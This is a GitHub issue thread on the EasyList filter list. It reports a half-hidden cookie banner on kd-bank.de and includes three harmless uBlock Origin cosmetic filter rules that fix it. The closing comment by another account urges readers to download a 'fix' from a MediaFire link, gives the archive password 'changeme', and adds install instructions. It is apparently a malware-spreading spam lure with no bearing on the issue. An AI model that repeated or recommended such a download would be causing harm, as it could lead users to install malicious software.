### ISSUE TITLE
kd-bank.de: broken cookie banner

### ISSUE THREAD

**Issue by qwerty287** [easylist/easylist#19889]
#### List the website(s) you're having issues with:

```
https://www.kd-bank.de
```

#### What happens?

The cookie banner is not fully hidden, but its content, making the site unusable.

#### Screenshot(s) 

![grafik](https://github.com/user-attachments/assets/b0bd2a38-6030-437e-944f-b1d0e804130d)

#### Filter lists you're using:

I tracked this down to the EasyList Cookie list. Disabling the list makes everything working again.

#### Your settings:

- Browser: Firefox
- Ad block extension: uBlock Origin

#### Other details:

I was able to solve this with:
```
www.kd-bank.de##.lightbox--cookie-consent
www.kd-bank.de##.darken-layer
www.kd-bank.de##body:remove-class(no-scroll)
```

**Comment by MirsonMboa** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
